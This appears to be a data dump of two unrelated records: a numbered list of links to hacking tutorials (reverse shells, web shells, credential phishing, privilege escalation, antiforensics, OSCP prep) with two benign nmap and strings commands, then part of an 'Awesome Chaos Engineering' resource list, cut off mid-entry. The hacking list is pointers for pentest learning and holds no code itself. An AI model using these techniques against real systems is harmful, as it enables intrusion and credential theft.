Metasploit:\n\n\nhttps://hackercool.com/2016/10/windows-post-exploitation-recon-with-metasploit\n\n\n\n-1913-Bug Hunting Methodology:\n\n\nhttps://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066\n\n\n-1914-Malware traffic analysis tutorial:\n\n\nhttps://apuntpsicolegs.com/veke0/malware-traffic-analysis-tutorial.html\n\n\n\n-1915-Recon-ng v5 Tutorial:\n\n\nhttps://geekwire.eu/recon-ng-v5-tutorial\n\n\n\n-1916-Windows and Linux Privilege Escalation Tools:\n\n\nhttps://yeahhub.com/windows-linux-privilege-escalation-tools-2019\n\n\n\n-1917-Total OSCP Guide:\n\n\nhttps://sushant747.gitbooks.io/total-oscp-guide\n\n\n-1918-Phishing Windows Credentials:\n\n\nhttps://pentestlab.blog/2020/03/02/phishing-windows-credentials\n\n\n-1919-Getting What You're Entitled To: A Journey Into MacOS Stored Credentials:\n\n\nhttps://mdsec.co.uk/2020/02/getting-what-youre-entitled-to-a-journey-in-to-macos-stored-credentials\n\n\n\n-1920-Recent Papers Related To Fuzzing:\n\n\nhttps://wcventure.github.io/FuzzingPaper\n\n\n\n\n-1921-Web Shells 101 Using PHP (Web Shells Part 2):\n\n\nhttps://acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/\n\n\n\n-1922-Python3 reverse shell:\n\n\n\nhttps://polisediltrading.it/hai6jzbs/python3-reverse-shell.html\n\n\n\n-1923-Reverse Shell between two Linux machines:\n\n\n\nhttps://yeahhub.com/reverse-shell-linux-machines\n\n\n\n-1924-Tutorial - Writing Hardcoded Windows Shellcodes (32bit):\n\n\n\nhttps://dsolstad.com/shellcode/2020/02/02/Tutorial-Hardcoded-Writing-Hardcoded-Windows-Shellcodes-32bit.html\n\n\n\n\n-1925-How to Use Wireshark: Comprehensive Tutorial + Tips:\n\n\n\nhttps://varonis.com/blog/how-to-use-wireshark\n\n\n\n-1926-How To Use PowerShell for Privilege Escalation with Local Privilege Escalation?\n\n\n\nhttps://varonis.com/blog/how-to-use-powershell-for-privilege-escalation-with-local-computer-accounts\n\n\n\n-1927-Ethical hacking:Top privilege escalation techniques in Windows:\n\n\nhttps://securityboulevard.com/2020/03/ethical-hacking-top-privilege-escalation-techniques-in-windows\n\n\n\n-1928-How to Identify Company's Hacked Email Addresses:\n\n\n\nhttps://ehacking.net/2020/04/how-to-identify-companys-hacked-email-addresses-using-maltego-osint-haveibeenpawned.html\n\n\n\n-1929-Android APK Reverse Engineering: What's in an APK:\n\n\n\nhttps://secplicity.org/2019/09/11/android-apk-reverse-engineering-whats-in-an-apk\n\n\n\n\n\n-1930-Keep Calm and HackTheBox - Beep:\n\n\nhttps://freecodecamp.org/news/keep-calm-and-hack-the-box-beep/\n\n\n-1931-Keep Calm and HackTheBox -Legacy:\n\n\nhttps://freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/\n\n\n\n-1932-Keep Calm and HackTheBox -Lame:\n\n\nhttps://freecodecamp.org/news/keep-calm-and-hack-the-box-lame/\n\n\n\n\n-1933-HacktheBox:Writeup Walkthrough:\n\n\nhttps://hackingarticles.in/hack-the-box-writeup-walkthrough\n\n\n\n-1934-2020 OSCP Exam Preparation:\n\n\n\nhttps://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp\n\n\n\n-1935-My OSCP transformation:\n\n\nhttps://kevsec.fr/journey-to-oscp-2019-write-up\n\n\n\n-1936-A Detailed Guide on OSCP Preparation:\n\n\n\nhttps://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/\n\n\n\n-1937-Useful Commands and Tools - #OSCP:\n\n\nhttps://yeahhub.com/useful-commands-tools-oscp/\n\n\n-1938-Comprehensive Guide on Password Spraying Attack\n\n\nhttps://hackingarticles.in/comprehensive-guide-on-password-spraying-attack\n\n\n-1939-Privilege Escalation:\n\n\nhttps://pentestlab.blog/category/privilege-escalation/\n\n\n-1940-Red Team:\n\n\nhttps://pentestlab.blog/category/red-team/\n\n\n\n-1941-Linux post-exploitation.Advancing from user to super-user in a few clicks\n\n\n\nhttps://hackmag.com/security/linux-killchain/\n\n\n\n-1942--#BugBounty Cheatsheet\n\n\nhttps://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html\n\n\n-1943--#Windows Notes/Cheatsheet\n\n\nhttps://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html\n\n\n-1944-#Linux Notes/Cheatsheet\n\n\nhttps://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html\n\n\n-1945-Windows Notes\n\n\nhttps://mad-coding.cn/tags/Windows/\n\n\n-1946-#BlueTeam CheatSheet\n\n\nhttps://gist.github.com/SwitHak/62fa7f8df378cae3a459670e3a18742d\n\n\n-1947-Linux Privilege Escalation Cheatsheet for OSCP:\n\n\nhttps://hackingdream.net/2020/03/linux-privilege-escalation-cheatsheet-for-oscp.html\n\n\n\n-1948-Shodan Pentesting Guide:\n\n\nhttps://community.turgensec.com/shodan-pentesting-guide\n \n \n \n -1949-Pentesters Guide to PostgreSQL Hacking:\n \n \n https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007\n\n\n\n\n-1950-Hacking-OSCP cheatsheet:\n\n\nhttps://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/\n\n\n-1951-A Comprehensive Guide to Breaking SSH:\n\n\n\nhttps://community.turgensec.com/ssh-hacking-guide\n\n\n\n\n-1952-Windows Privilege Escalation Methods for Pentesters:\n\n\n\nhttps://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\n\n\n\n-1953-Best #firefox addons for #Hacking:\n\n\nhttps://twitter.com/cry__pto/status/1210836734331752449\n\n\n\n-1954-S3 Bucket Enumeration Tools:\n\n\nhttps://twitter.com/cry__pto/status/1269862357645307904\n\n\n-1955-Github Recon Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1269362041044832257\n\n\n\n\n-1956-i created this group for more in depth sharing about hacking and penetration testing /daily posts: you can join:\n\n\n\nhttps://facebook.com/groups/AmmarAmerHacker\n\n\n\n-1957-Directory Bruteforcing Tools: && SCREENSHOTTING Tools:\n\n\nhttps://twitter.com/cry__pto/status/1270603017256124416\n\n\n\n-1958-S3 Bucket Enumeration Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1269862357645307904\n\n\n\n-1959-Github Recon Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1269362041044832257\n\n\n\n\n-1960-Website Mirroring Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1248640849812078593\n\n\n\n-1961-automated credential discovery tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1253214720372465665\n\n\n\n-1962-Antiforensics Techniques:\n\n\n\nhttps://twitter.com/cry__pto/status/1215001674760294400\n\n\n\n-1963-#bugbounty tools part (1):\n\n\nhttps://twitter.com/cry__pto/status/1212096231301881857\n\n\n\n1964-Binary Analysis Frameworks:\n\n\n\nhttps://twitter.com/cry__pto/status/1207966421575184384\n\n\n\n-1965-#BugBounty tools part (5):\n\n\n\nhttps://twitter.com/cry__pto/status/1214850754055458819\n\n\n\n-1966-#BugBounty tools part (3):\n\n\nhttps://twitter.com/cry__pto/status/1212290510922158080\n\n\n\n-1967-Kali Linux Commands List (Cheat Sheet):\n\n\n\nhttps://twitter.com/cry__pto/status/1264530546933272576\n\n\n\n-1968-#BugBounty tools part (4):\n\n\n\nhttps://twitter.com/cry__pto/status/1212296173412851712\n\n\n\n\n-1969--Automated enumeration tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1214919232389099521\n\n\n\n-1970-DNS lookup information Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1248639962746105863\n\n\n\n\n-1971-OSCP:\n\n\nhttps://twitter.com/cry__pto/status/1262089078339756032\n\n\n\n-1972-Social Engineering Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1180731438796333056\n\n\n\n-1973-Hydra :\n\n\nhttps://twitter.com/cry__pto/status/1247507926807449600\n\n\n\n-1974-#OSINT Your Full Guide:\n\n\n\nhttps://twitter.com/cry__pto/status/1244433669936349184\n\n\n\n-1975-#BugBounty tools part (2):\n\n\n\nhttps://twitter.com/cry__pto/status/1212289852059860992\n\n\n\n-1976-my own ebook library:\n\n\n\nhttps://twitter.com/cry__pto/status/1239308541468516354\n\n\n\n\n-1977-Practice part (2):\n\n\n\nhttps://twitter.com/cry__pto/status/1213165695556567040\n\n\n\n-1978-Practice part (3):\n\n\n\nhttps://twitter.com/cry__pto/status/1214220715337097222\n\n\n\n\n-1979-my blog:\n\n\n\nhttps://twitter.com/cry__pto/status/1263457516672954368\n\n\n-1980-Practice:\n\n\n\nhttps://twitter.com/cry__pto/status/1212341774569504769\n\n\n\n-1981-how to search for XSS without proxy tool:\n\n\nhttps://twitter.com/cry__pto/status/1252558806837604352\n\n\n\n-1982-How to collect email addresses from search engines:\n\n\n\nhttps://twitter.com/cry__pto/status/1058864931792138240\n\n\n\n-1983-Hacking Tools Cheat Sheet:\n\n\n\nhttps://twitter.com/cry__pto/status/1255159507891687426\n\n\n-1984-#OSCP Your Full Guide:\n\n\n\nhttps://twitter.com/cry__pto/status/1240842587927445504\n\n\n\n-1985-#HackTheBox Your Full Guide:\n\n\nhttps://twitter.com/cry__pto/status/1241481478539816961\n\n\n\n\n-1986-Web Scanners:\n\n\n\nhttps://twitter.com/cry__pto/status/1271826773009928194\n\n\n-1987-HACKING MAGAZINES:\n\n-1-2600 — The Hacker Quarterly magazine:www.2600.com\n\n-2-Hackin9:http://hakin9.org\n\n-3-(IN)SECURE magazine:https://lnkd.in/grNM2t8\n\n-4-PHRACK:www.phrack.org/archives\n\n-5-Hacker’s Manual 2019\n\n\n-1988-Web Exploitation Tools:\n\n\nhttps://twitter.com/cry__pto/status/1272778056952885249\n\n\n\n\n\n-1989-Kali Linux Cheat Sheet for Hackers:\n\n\nhttps://twitter.com/cry__pto/status/1272792311236263937\n\n\n\n-1990-Web Exploitation Tools:\n\n\nhttps://twitter.com/cry__pto/status/1272778056952885249\n\n\n\n\n-1991-2020 OSCP Exam Preparation + My OSCP transformation +A Detailed Guide on OSCP Preparation + Useful Commands and Tools - #OSCP:\n\n\nhttps://twitter.com/cry__pto/status/1262089078339756032\n\n\n\n-1992-100 Best Hacking Tools for Security Professionals in 2020:\n\n\nhttps://gbhackers.com/hacking-tools-list/\n\n\n\n-1993-SNMP Enumeration:\n\nOpUtils:www.manageengine.com\n\nSNMP Informant:www.snmp-informant.com\n\nSNMP Scanner:www.secure-bytes.com\n\nSNMPUtil:www.wtcs.org\n\nSolarWinds:www.solarwinds.com\n\n\n\n\n\n\n\n-1994-INFO-SEC RELATED CHEAT SHEETS:\n\n\nhttps://twitter.com/cry__pto/status/1274768435361337346\n\n\n\n-1995-METASPLOIT CHEAT SHEET:\n\n\nhttps://twitter.com/cry__pto/status/1274769179548278786\n\n\n\n\n-1996-Nmap Cheat Sheet, plus bonus Nmap + Nessus:\n\n\nhttps://twitter.com/cry__pto/status/1275359087304286210\n\n\n-1997-Wireshark Cheat Sheet - Commands, Captures, Filters, Shortcuts & More:\n\n\n\nhttps://twitter.com/cry__pto/status/1276391703906222080\n\n\n\n-1998-learn penetration testing a great series as PDF:\n\n\nhttps://twitter.com/cry__pto/status/1277588369426526209\n\n\n-1999-Detecting secrets in code committed to Gitlab (in real time):\n\n\nhttps://www.youtube.com/watch?v=eCDgUvXZ_YE\n\n\n-2000-Penetration Tester’s Guide to Evaluating OAuth 2.0 — Authorization Code Grants:\n\n\nhttps://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html\n\n\n\n-2001-Building Virtual Machine Labs:\n\n\nhttps://github.com/da667/Building_Virtual_Machine_Labs-Live_Training\n\n\n\n-2002-Windows Kernel Exploit Cheat Sheet for [HackTheBox]:\n\n\nhttps://kakyouim.hatenablog.com/entry/2020/05/27/010807 \n\n\n-2003-19 Powerful Penetration Testing Tools In 2020 (Security Testing Tools):\n\n\nhttps://softwaretestinghelp.com/penetration-testing-tools/ \n\n\n-2004-Full Connect Scan (-sT):\n\n-complete the three-way handshake\n\n-slower than SYN scan\n\n-no need for superuser Privileges\n\n-when stealth is not required\n\n-to know for sure which port is open\n\n-when running port scan via proxies like TOR\n\n-it can be detected\n\nnmap -sT -p 80 192.168.1.110\n\n\n-2005-today i learned that you can use strings command to extract email addresses from binary files:\n\n\nstrings -n 8 /usr/bin/who | grep '@'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
2,"# Awesome Chaos Engineering [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\nA curated list of awesome [Chaos Engineering](http://principlesofchaos.org/) resources.\n\n#### What is Chaos Engineering?\n> Chaos Engineering is the discipline of experimenting on a distributed system in order to build confidence in the system’s capability to withstand turbulent conditions in production. - [Principles Of Chaos Engineering](http://principlesofchaos.org/) website.\n\n## Contents\n- [Culture](#culture)\n- [Books](#books)\n- [Education](#education)\n- [Notable Tools](#notable-tools)\n- [Papers](#papers)\n- [Gamedays](#gamedays)\n- [Blogs & Newsletters](#blogs--newsletters)\n- [Conferences & Meetups](#conferences--meetups)\n- [Forums](#forums)\n- [Twitter](#twitter)\n\n## Culture\n* [Principles Of Chaos Engineering](http://principlesofchaos.org/)\n* [Chaos Community](http://chaos.community/)\n* [Chaos Engineering](https://www.infoq.com/articles/chaos-engineering)\n* [O'Reilly Velocity San Jose 2017: Precision Chaos](https://www.youtube.com/watch?v=C11LNUEaHuo)\n* [The Discipline of Chaos Engineering](https://www.gremlin.com/blog/the-discipline-of-chaos-engineering/)\n* [Chaos Monkey for Fun and Profit](https://sharpend.io/chaos-monkey-for-fun-and-profit/)\n* [Fault Injection in Production: Making the case for resilience testing](https://queue.acm.org/detail.cfm?id=2353017)\n* [Lord of Chaos - Becoming a Chaos Engineer](https://vimeo.com/groups/jz2016/videos/181925286)\n* [Chaos testing - Preventing failure by instigation](http://www.cakesolutions.net/teamblogs/chaos-testing-preventing-failure-by-instiga)\n* [Orchestrated Chaos](https://docs.google.com/presentation/d/1zzHS3qoPGzwsSna5-uk3Xt7LW_3Fr6ag8JDkeyrKwL4/edit#slide=id.p)\n* Choose your own adventure: Chaos Engineering - [Video](https://www.infoq.com/presentations/adopt-chaos-engineering) & [Slides](https://www.slideshare.net/NoraJones1/choose-your-own-adventure-qcon-2017-1)\n* [AMA Chaos Engineering + DiRT](http://pages.catchpoint.com/AMA-Chaos-DiRT.html)\n* [SRECON17: Principles of Chaos Engineering](https://www.usenix.org/conference/srecon17americas/program/presentation/rosenthal)\n* [Chaos & Intuition Engineering at Netflix](https://www.youtube.com/watch?v=Q4nniyAarbs)\n* [Mastering Chaos - A Netflix Guide to Microservices](https://www.youtube.com/watch?v=CZ3wIuvmHeM)\n* [Too big to test: Breaking a production brokerage platform without causing financial devastation](https://conferences.oreilly.com/velocity/devops-web-performance-ny-2015/public/schedule/detail/45012)\n* [Inside Azure Search: Chaos Engineering](https://azure.microsoft.com/en-us/blog/inside-azure-search-chaos-engineering/)\n* [Netflix, the Simian Army, and the culture of freedom and responsibility](https://devops.com/netflix-the-simian-army-and-the-culture-of-freedom-and-responsibility/)\n* [FIT: Failure Injection Testing](https://medium.com/netflix-techblog/fit-failure-injection-testing-35d8e2a9bb2)\n* [The Netflix Simian Army](https://medium.com/netflix-techblog/the-netflix-simian-army-16e57fbab116)\n* [Automated Failure Testing](https://medium.com/netflix-techblog/automated-failure-testing-86c1b8bc841f)\n* [The Verification of a Distributed System by Caitie McCaffrey](http://queue.acm.org/detail.cfm?ref=rss&id=2889274)\n* [The Journey to Chaos Engineering begins with a single step - Bruce Wong and James Burns (Twilio)](https://www.youtube.com/watch?v=rKAo2wANiHM)\n* [Chaos Engineering by Lorin Hochstein](https://www.youtube.com/watch?v=vq4QZ4_YDok)\n* [Aaron Rinehart - ChaoSlingr: Introducing Security based Chaos Testing](https://www.youtube.com/watch?v=BLRb-E0G5zk)\n* [Chaos Engineering - Casey Rosenthal](https://www.youtube.com/watch?v=6OIOpx_dVFY)\n* The Road to Chaos - Velocity 2017- [video](https://www.youtube.com/watch?v=FCZVAZaXIjs) & [slides](https://github.com/norajones/Presentations/blob/master/The%20Road%20To%20Chaos%20-%20Velocity%202017.pdf)\n* [How Netflix DDoS’d Itself To Help Protect the Entire Internet](https://www.wired.com/story/netflix-ddos-attack)\n* [10 Years of Crashing Google](https://www.usenix.org/conference/lisa15/conference-program/presentation/krishnan)\n* [Weathering the Unexpected](http://queue.acm.org/detail.cfm?id=2371516)\n* [SRECON17: Breaking Things on Purpose](https://youtu.be/h_-shm0SL08)\n* [PuppetConf 2016: Chaos Patterns - Architecting for Failure in Distributed Systems](https://youtu.be/V3P35N_HXNQ)\n* [Ship More, Sink Less - Changing Chaos Engineering and Distributed Tracing](https://youtu.be/nr2KWbyWAmA)\n* [Cloudcast - Discipline of Chaos Engineering](http://www.thecloudcast.net/2017/05/the-cloudcast-299-discipline-of-chaos.html)\n* [Software Engineering Daily - Failure Injection with Kolton Andrus podcast](https://softwareengineeringdaily.com/2017/03/29/failure-injection-with-kolton-andrus/)\n* [Responding to Failures in Playback Features with Haley Tucker podcast](https://www.infoq.com/podcasts/netflix-haley-tucker?utm_campaign=infoq_content&utm_source=twitter&utm_medium=feed&utm_term=architecture-design)\n* [""Antics, drift, and chaos"" by Lorin Hochstein](https://youtu.be/SM2uXpmyJmA)\n* [re:invent 2017: Nora Jones Describes Why We Need More Chaos - Chaos Engineering, That Is](https://youtu.be/rgfww8tLM0A)\n* [Failure Friday: Four Years On](https://www.pagerduty.com/blog/failure-fridays-four-years/)\n* [Monkeys & Lemurs and Locusts, Oh my!](https://www.slideshare.net/zgrinch/monkeys-lemurs-and-locusts-oh-my)\n* [Practical Chaos Engineering](https://youtu.be/Yn4tYxqzFVU)\n* [Chaos Day in the Met Office Cloud](https://www.cloudreach.com/fr/blog/training-cloud-operations-teams-met-office/)\n* [Cloud Native and Chaos Engineering](https://medium.com/chaosiq/cloud-native-and-chaos-engineering-20842ee2fa8a)\n* [Chaos Engineering with Kolton Andrus](https://softwareengineeringdaily.com/2018/02/02/chaos-engineering-with-kolton-andrus/)\n* [Chaos Engineering: the history, principles, and practice](https://www.gremlin.com/community/tutorials/chaos-engineering-the-history-principles-and-practice/)\n* [Embracing the Chaos of Chaos Engineering](https://blog.codeship.com/embracing-the-chaos-of-chaos-engineering/)\n* [Designing Services for Resilience: Netflix Lessons](https://www.infoq.com/presentations/netflix-microservices-resiliency)\n* [Chaos Engineering: A cheat sheet](https://www.techrepublic.com/article/chaos-engineering-a-cheat-sheet/)\n* [How to convince your boss and make them say “Yes!” to Chaos Engineering?](https://medium.com/@crochefolle/how-to-convince-your-boss-to-make-them-say-yes-to-chaos-engineering-796ba119bd7)\n* [Why the World Needs More Resilient Systems](https://www.infoq.com/news/2018/03/resilient-systems-chaos-engineer)\n* [Chaos Architecture](https://www.infoq.com/presentations/chaos-architecture-mindset)\n* [Gremlin’s Tammy Bütow on the Business Side of Chaos Engineering](https://thenewstack.io/gremlins-tammy-butow-on-the-business-side-of-chaos-engineering/)\n* [Kubernetes Chaos Engineering: Lessons Learned](https://learnk8s.io/blog/kubernetes-chaos-engineering-lessons-learned)\n* [Chaos Engineering: managing complexity by breaking things](https://hub.packtpub.com/chaos-engineering-managing-complexity-by-breaking-things/)\n* [Podcast:Database Chaos with Tammy Butow](https://softwareengineeringdaily.com/2018/04/10/database-chaos-with-tammy-butow/)\n* [LinkedOut: A Request-Level Failure Injection Framework](https://engineering.linkedin.com/blog/2018/05/linkedout--a-request-level-failure-injection-framework)\n* [GOTO 2018 - Breaking Things on Purpose - Kolton Andrus](https://youtu.be/S89ox7oQn8s)\n* [Why should Chaos be part of your Distributed Systems Engineering?](https://medium.com/@bbideep/why-should-chaos-be-part-of-your-distributed-systems-engineering-5bcb21497660)\n* [Brian Holt - Chaos Monkeys in Your Browser What Chaos Engineering Means For the Front End](https://www.youtube.com/watch?v=A4_rRj-4Mv0)\n* [Chaos Engineering: Why the World Needs More Resilient Systems](https://www.youtube.com/watch?time_continue=242&v=Khqf0XltR_M)\n* QCon·Beijing 2017: The Practice of Failure Management and Fault Injection at Alibaba E-Commerce Platforms - [video](http://www.infoq.com/cn/presentations/ali-electricity-supplier-fault-management-and-fault-drills-practice) & [speech draft](http://jm.taobao.org/2017/06/22/20170622/) (Chinese speech)\n* [Orchestrating Chaos using Grab's Experimentation Platform](https://engineering.grab.com/chaos-engineering)\n* [Breaking to Learn: Chaos Engineering Explained](https://blog.newrelic.com/engineering/chaos-engineering-explained/)\n* [Chaos Engineering Traps](https://medium.com/@njones_18523/chaos-engineering-traps-e3486c526059)\n* [Chaos Engineering - The Art of Breaking Things Purposefully](https://medium.com/@adhorn/chaos-engineering-ab0cc9fbd12a)\n* [Disasterpiece Theater: Slack’s process for approachable Chaos Engineering](https://slack.engineering/disasterpiece-theater-slacks-process-for-approachable-chaos-engineering-3434422afb54)\n* [Taming chaos: Preparing for your next incident](https://www.oreilly.com/ideas/taming-chaos-preparing-for-your-next-incident)\n* [The Future of Chaos Engineering w/ Conde Nast](https://www.youtube.com/watch?v=RqM2sMt11Bw)\n* [Chaos Engineering For People Systems w/ Dave Rensin of Google](https://www.youtube.com/watch?v=sn6wokyCZSA)\n* [Performing chaos engineering in a serverless world (AWS re:Invent 2019 CMY301)](https://www.youtube.com/watch?v=vbyjpMeYitA)\n* [Building Confidence in Healthcare Systems through Chaos Engineering](https://www.infoq.com/presentations/cerner-resiliency)\n* [Break Your App before Someone Else Does](https://www.infoq.com/presentations/test-android-apk/)\n* [Preparing for Traffic Spikes with Chaos Engineering](https://www.bigmarker.com/gremlin/Preparing-for-Traffic-Spikes-with-Chaos-Engineering)\n* [Automating Chaos Engineering GameDays with Terraform](https://www.youtube.com/watch?v=NOOgKNbW0gk)\n* [Postmortem Culture: Learning from failure](https://www.youtube.com/watch?v=JtLrlDNdJzg&feature=youtu.be)\n* [Problem Detection by John Allspaw](https://www.youtube.com/watch?v=NxctiGRI2y8)\n* [New Paradigms for the Next Era of Security](https://www.rsaconference.com/industry-topics/webcast/35-new-paradigms-for-the-next-era-of-security)\n* [Cloud-Native Chaos Engineering](https://dev.to/umamukkara/chaos-engineering-for-cloud-native-systems-2fjn)\n* [Building resilient services at Prime Video with chaos engineering](https://aws.amazon.com/blogs/opensource/building-resilient-services-at-prime-video-with-chaos-engineering/)\n* [Making Chaos Part of Kubernetes/OpenShift Performance and Scalability Tests](https://www.openshift.com/blog/making-chaos-part-of-kubernetes/openshift-performance-and-scalability-tests)\n* [Lucky Lotto, chaos engineering but for teams](https://danlebrero.com/2021/06/30/cto-dairy-lucky-lotto-chaos-engineering-for-teams/)\n* [Using Fault Injection Testing to Improve DoorDash Reliability](https://doordash.engineering/2022/04/25/using-fault-injection-testing-to-improve-doordash-reliability/)\n* [Chaos Engineering At Ant Group](https://medium.com/@monkeysuzie/chaos-engineering-at-ant-group-30c15cb6ab69)\n\n## Books\n* [Chaos Engineering: Building Confidence in System Behavior through Experiment](http://www.oreilly.com/webops-perf/free/chaos-engineering.csp)\n* [Site Reliability Engineering: How Google Runs Production Systems](https://landing.google.com/sre/book.html) -\n* [The Practice Of Cloud System Administration: Designing and Operating Large Distributed Systems](http://the-cloud-book.com/)\n* [Antifragile Systems and Teams](http://www.oreilly.com/webops-perf/free/antifragile-systems-and-teams.csp)\n* [The InfoQ eMag: Chaos Engineering](https://www.infoq.com/minibooks/emag-chaos-engineering)\n* [Learning Chaos Engineering](http://shop.oreilly.com/product/0636920251897.do)\n* [Chaos Engineering: System Resilience in Practice](https://www.oreilly.com/library/view/chaos-engineering/9781492043850/)\n* [Chaos Engineering: Crash test your applications](https://www.manning.com/books/chaos-engineering)\n* [Security Chaos Engineering: Gaining Confidence in Resilience and Safety at Speed and Scale](https://www.oreilly.com/library/view/security-chaos-engineering/9781492080350/)\n* [Chaos Engineering Observability](https://www.humio.com/resources/reports/chaos-observability/)\n\n## Education\n* A Chaos Engineering Bootcamp for O'Reilly Velocity 2017 - [Slides](https://speakerdeck.com/tammybutow/chaos-engineering-bootcamp) & [Source code](https://github.com/tammybutow/chaos_engineering_bootcamp)\n* [Your First Chaos Experiment](https://www.gremlin.com/community/tutorials/your-first-chaos-experiment)\n* [Chaos Engineering 101](https://sharpend.io/chaos-engineering-101/)\n* [A Primer on Automating Chaos](https://www.gremlin.com/community/tutorials/a-primer-on-automating-chaos)\n* [Intro to Chaos Engineering](https://www.youtube.com/watch?v=qHykK5pFRW4)\n* [Learn the basics of the Chaos Toolkit](https://www.katacoda.com/chaostoolkit/courses/01-chaostoolkit-getting-started)\n* [Build System Confidence with Chaos Engineering](https://medium.com/chaosiq/improve-your-cloud-native-devops-flow-with-chaos-engineering-dc32836c2d9a)\n* [How we break things at Twitter: failure testing](https://blog.twitter.com/engineering/en_us/a/2015/how-we-break-things-at-twitter-failure-testing.html)\n* [Run Chaos Experiments Without Risking Your Job](https://blog.loadmill.com/run-chaos-experiments-without-risking-your-job-2c8a5f4b0bfc)\n* [A Guide to Your First Chaos Day](https://victorops.com/blog/a-guide-to-your-first-chaos-day)\n* [Planning Your Own Chaos Day](https://www.gremlin.com/community/tutorials/planning-your-own-chaos-day/)\n* [How To Install Distributed Tensorflow on GCP and Perform Chaos Engineering Experiments](https://www.gremlin.com/community/tutorials/how-to-install-distributed-tensorflow-on-gcp-and-perform-chaos-engineering-experiments/)\n* [Monitoring Your Chaos Experiments](https://www.brighttalk.com/webcast/15087/316835)\n* [Increasing the Resilience of APIs with Chaos Engineering](https://www.infoq.com/news/2018/05/gremlin-api-chaos)\n* [3 key steps for running chaos engineering experiments](https://www.infoworld.com/article/3268017/devops/3-key-steps-for-running-chaos-engineering-experiments.html)\n* [Exploring Multi-level Weaknesses using Automated Chaos Experiments](https://medium.com/chaosiq/exploring-multi-level-weaknesses-using-automated-chaos-experiments-aa30f0605ce)\n* [Chaos Monkey Guide for Engineers](https://www.gremlin.com/chaos-monkey/)\n* [Chaos Engineering for Serverless](https://www.youtube.com/playlist?list=PL70SCo-0vujiQkPAOGuZP-kNZZkzcPVKD)\n* [Network Fire Drills with Chaos Engineering](https://speakerdeck.com/homingli/network-automation-meetup-network-fire-drills-with-chaos-engineering)\n* [Dev Ops Foundations: Chaos Engineering](https://www.linkedin.com/learning/devops-foundations-chaos-engineering/)\n* [Resilience Engineering: Short Course](http://csel.org.ohio-state.edu/ResilienceEngineering.html)\n* [The Chaos Engineering Collection](https://medium.com/@adhorn/the-chaos-engineering-collection-5e188d6a90e2)\n* [PenTester Academic](https://www.pentesteracademy.com/onlinelabs)\n* [Consul and Chaos Engineering](https://learn.hashicorp.com/tutorials/consul/introduction-chaos-engineering?in=consul/resiliency)\n\n## Notable Tools\n* [Chaos Monkey](https://github.com/Netflix/chaosmonkey) - A resiliency tool that helps applications tolerate random instance failures.\n* [orchestrator](https://github.com/github/orchestrator) - MySQL replication topology management and HA.\n* [kube-monkey](https://github.com/asobti/kube-monkey) - An implementation of Netflix's Chaos Monkey for Kubernetes clusters.\n* [Gremlin Inc.](https://www.gremlin.com/) - Failure as a Service.\n* [Chaos Toolkit](https://github.com/chaostoolkit/chaostoolkit) - A chaos engineering toolkit to help you build confidence in your software system.\n* [steadybit](https://www.steadybit.com/) - A Chaos Engineering platform (SaaS or On-Prem) with auto discovery features, different attack types, user management and many more.\n* [PowerfulSeal](https://github.com/bloomberg/powerfulseal) - Adds chaos to your Kubernetes clusters, so that you can detect problems in your systems as early as possible. It kills targeted pods and takes VMs up and down.\n* [drax](https://github.com/dcos-labs/drax) - DC/OS Resilience Automated Xenodiagnosis tool. It helps to test DC/OS deployments by applying a Chaos Monkey-inspired, proactive and invasive testing approach.\n* [Wiremock](http://wiremock.org/) - API mocking (Service Virtualization) which enables modeling real world faults and delays\n* [MockLab](http://get.mocklab.io/) - API mocking (Service Virtualization) as a service which enables modeling real world faults and delays.\n* [Pod-Reaper](https://github.com/target/pod-reaper) - A rules based pod killing container. Pod-Reaper was designed to kill pods that meet specific conditions that can be used for Chaos testing in Kubernetes.\n* [Muxy](https://github.com/mefellows/muxy/) - A chaos testing tool for simulating a real-world distributed system failures.\n* [Toxiproxy](https://github.com/Shopify/toxiproxy) - A TCP proxy to simulate network and system conditions for chaos and resiliency testing.\n* Chaos engineering for Docker:\n * [Pumba](https://github.com/gaia-adm/pumba) - Chaos testing and network emulation for 